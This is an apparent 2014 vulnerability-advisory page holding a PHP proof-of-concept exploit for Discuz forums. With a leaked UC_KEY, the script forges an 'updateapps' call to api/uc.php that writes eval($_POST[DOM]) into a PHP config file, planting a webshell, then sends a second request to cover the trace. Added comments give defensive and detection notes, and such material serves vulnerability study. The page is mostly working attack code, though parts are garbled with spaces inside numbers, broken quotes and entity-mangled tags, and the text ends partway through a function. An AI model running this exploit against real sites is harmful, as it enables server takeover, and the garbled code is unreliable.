Discuz: getshell via UC_KEY — vulnerability warning — The Black Bar Safety Net

2014-01-13T00:00:00
ID MYHACK58:62201441801
Type myhack58
Reporter 佚名
Modified 2014-01-13T00:00:00

Description

From:http://www. tick. org/bugs/tick-2 0 1 4-0 4 8 1 3 7

<? php

// Proof-of-concept reproduced by the advisory. Precondition: the attacker knows
// UC_KEY, the shared secret between Discuz and its UCenter server. With it, an
// authenticated "updateapps" call to api/uc.php can be forged, and the value it
// carries ends up written into a PHP configuration file. Defender's view: the
// code below works only because of the key; rotating an exposed UC_KEY and
// keeping the forum's config files out of the web user's write scope are the
// controls that matter. Note that the text on this page is garbled in places
// (spaces inside numbers, "?& gt;" for "?>", '"' for "''"); it is kept as-is.
// Code copyright belongs to the original author.

// A timestamp set ahead of now. The "time=" field is presumably compared with
// the receiving server's clock by api/uc.php; that check is not visible here.
$timestamp = time()+1 0*3 6 0 0;

// Target host; send() connects to it on port 80.
$host="127.0.0.1";

// The leaked UC_KEY. Everything after this line depends on knowing it.
$uc_key="eapf15K8b334Bc8eBeY4Gfn1VbqeA0N5waofq6j285ca33i151e551g0l9f2l3dd";

// Forged "updateapps" command, encrypted with _authcode (defined further down
// the page) under the leaked key. Detection hint: an updateapps request to
// /api/uc.php that does not come from the site's own UCenter host.
$code=urlencode(_authcode("time=$timestamp&action=updateapps", 'ENCODE', $uc_key));

// First request body. The UC_API value looks designed to terminate the
// single-quoted PHP string that updateapps writes into the config file and to
// append an eval() of a POST parameter — the "getshell" of the title.
// Detection hint: a config file under the forum root containing eval( or a
// UC_API entry ending in "');".
$cmd1='<? xml version="1.0" encoding="ISO-8 8 5 9-1"?& gt;

<root>

<item id="UC_API">http://x\');eval($_POST[DOM]);//</item>

</root>';

// Second request body with a harmless UC_API value, sent right after the first
// one, apparently to overwrite the visible trace. File-integrity monitoring
// would still record two writes to the same config file in quick succession.
$cmd2='<? xml version="1.0" encoding="ISO-8 8 5 9-1"?& gt;

<root>

<item id="UC_API">http://x</item>

</root>';

// Both raw HTTP responses are printed unmodified.
$html1 = send($cmd1);

echo $html1;

$html2 = send($cmd2);

echo $html2;

// Sends $cmd as the body of a hand-built HTTP/1.1 POST to /api/uc.php on
// $host (port 80) and returns the raw response text, headers included.
// Reads the file-level globals $host and $code. No TLS, no error handling:
// if fsockopen() fails, fputs() is still called on a false handle and the
// function returns an empty string.
function send($cmd){

global $host,$code;

// Request line; the forged, urlencoded authcode travels in the query string.
$message = "POST /api/uc. php? code=".$ code." HTTP/1.1\r\n";

$message .= "Accept: /\r\n";

// Referer is simply the target host name, not a URL.
$message .= "Referer: ".$ host."\ r\n";

$message .= "Accept-Language: zh-cn\r\n";

$message .= "Content-Type: application/x-www-form-urlencoded\r\n";

// Fixed, dated User-Agent (MSIE 6 on Windows XP). In web-server logs this
// string combined with a POST to /api/uc.php is a usable detection signature.
$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";

$message .= "Host: ".$ host."\ r\n";

// strlen() is correct here: the body is raw bytes, not user-visible text.
$message .= "Content-Length: ". strlen($cmd)."\ r\n";

$message .= "Connection: Close\r\n\r\n";

$message .= $cmd;

//var_dump($message);

// Plain TCP connection on port 80; the return value is never checked.
$fp = fsockopen($host, 8 0);

fputs($fp, $message);

// Accumulate the whole response until the server closes the connection
// (it sent "Connection: Close"). The $fp guard keeps the loop from running
// on a failed connection.
$resp = ";

while ($fp && ! feof($fp))

$resp .= fread($fp, 1 0 2 4);

return $resp;

}

function _authcode($string, $operation = 'DECODE', $key = ", $expiry = 0) {

$ckey_length = 4;

$key = md5($key ? $key : UC_KEY);

$keya = md5(substr($key, 0, 1 6));

$keyb = md5(substr($key, 1 6, 1 6));

$keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : ";

$cryptkey = $keya. md5($keya.$ keyc);

$key_length = strlen($cryptkey);

$string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0). substr(md5($string.$ keyb), 0, 1 6).$ string;

$string_length = strlen($string);

$result = ";

$box = range(0, 2 5 5);

$rndkey = array();

for($i = 0; $i <= 2 5 5; $i++) {

$rndkey[$i] = ord($cryptkey[$i % $key_length]);

}

for($j = $i = 0; $i < 2 5 6; $i++) {

$j = ($j + $box[$i] + $rndkey[$i]) % 2 5 6;

$tmp = $box[$i];

$box[$i] = $box[$j];

$box[$j] = $tmp;

}

for($a = $j = $i = 0; $i < $string_length; $i++) {

$a = ($a + 1) % 2 5 6;

$j = ($j + $box[$a]) % 2 5 6;

$tmp = $box[$a];

$box[$a] = $box[$j];

$box[$j] = $tmp;

$result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 2 5 6]));

}

if($operation == 'DECODE') {

if((substr($result, 0, 1 0) == 0 || substr($result, 0, 1 0) - time() > 0) && substr($result, 1 0, 1 6) == substr(md5(substr($result, 2 6).$ keyb), 0, 1 6)) {

return substr($result, 2 6);
